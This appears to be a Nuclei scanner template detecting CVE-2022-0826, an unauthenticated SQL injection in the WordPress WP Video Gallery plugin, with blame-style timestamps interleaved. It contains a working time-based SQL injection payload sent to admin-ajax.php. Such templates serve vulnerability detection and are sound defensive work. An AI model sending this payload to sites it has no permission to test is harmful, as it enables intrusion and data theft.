2022-12-02 10:39:14 +00:00
id : CVE-2022-0826
info :
2023-01-16 17:41:15 +00:00
name : WordPress WP Video Gallery <=1.7.1 - SQL Injection
2022-12-02 10:39:14 +00:00
author : theamanrawat
severity : critical
description : |
2023-01-16 17:41:15 +00:00
WordPress WP Video Gallery plugin through 1.7.1 contains a SQL injection vulnerability. The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2022-12-02 10:39:14 +00:00
reference :
- https://wpscan.com/vulnerability/7a3eed3b-c643-4e24-b833-eba60ab631c5
- https://wordpress.org/plugins/wp-video-gallery-free/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0826
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2022-0826
cwe-id : CWE-89
metadata :
2022-12-05 06:01:29 +00:00
verified : true
2022-12-08 13:58:02 +00:00
tags : cve2022,wp-plugin,wpscan,cve,wordpress,wp,sqli,wp-video-gallery-free,unauth
2022-12-02 10:39:14 +00:00
requests :
- raw :
- |
@timeout : 15s
POST /wp-admin/admin-ajax.php HTTP/1.1
2022-12-03 11:07:30 +00:00
Host : {{Hostname}}
2022-12-02 10:39:14 +00:00
Content-Type : application/x-www-form-urlencoded
action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523
2022-12-05 06:01:29 +00:00
2022-12-02 10:39:14 +00:00
matchers :
- type : dsl
dsl :
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
2022-12-05 06:01:29 +00:00
- 'contains(body, "Registred videos :")'
condition : and
2023-01-16 17:41:15 +00:00
# Enhanced by md on 2023/01/06